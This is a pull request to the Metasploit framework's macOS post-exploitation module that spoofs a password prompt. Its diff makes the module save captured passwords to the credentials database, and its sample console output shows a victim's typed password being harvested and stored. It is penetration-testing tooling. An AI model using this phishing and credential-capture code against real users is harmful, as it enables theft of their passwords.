### PR TITLE
osx/gather/password_prompt_spoof now stores password

### DIFF
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@@ -106,6 +106,19 @@ class MetasploitModule < Msf::Post
       print_good("password file contents: #{password_data}")
       passf = store_loot("password", "text/plain", session, password_data, "passwd.pwd", "OSX Password")
       print_good("Password data stored as loot in: #{passf}")
+      pwd = password_data.split(':', 3)
+      pwd.shift() # date
+      pwd.shift() # username
+      create_credential({
+        workspace_id: myworkspace_id,
+        post_reference_name: self.refname,
+        private_data: pwd,
+        origin_type: :session,
+        session_id: session_db_id,
+        private_type: :password,
+        username: username
+        }
+      )
     else
       print_status("Timeout period expired before credentials were entered!")
     end


### PR DESCRIPTION
Fixes #11732 

`password_prompt_spoof` didn't used to store the password in the db.  Now it does!

```
msf5 post(osx/gather/password_prompt_spoof) > rexploit
[*] Reloading module...

[*] Running module against MacBook-Pro.ragegroup
[*] Waiting for user 'victim' to enter credentials...
[*] Password entered! What a nice compliant user...
creds[+] password file contents: 20190416_195206:victim:a:b:::

[+] Password data stored as loot in: /loot/20190416195208_default_222.222.2.222_password_000360.txt
[*] Cleaning up files in MacBook-Pro.ragegroup:/tmp/.qybLmpIXLzEtq
[*] Post module execution completed
msf5 post(osx/gather/password_prompt_spoof) > creds
Credentials
===========

host  origin         service  public  private         realm  private_type  JtR Format
----  ------         -------  ------  -------         -----  ------------  ----------
      222.222.2.222           victim  a:b:::                 Password      
```

Steps to verify:

- [ ] get a shell
- [ ]  use this module
- [ ]  make sure when you enter the password its now stored in the db!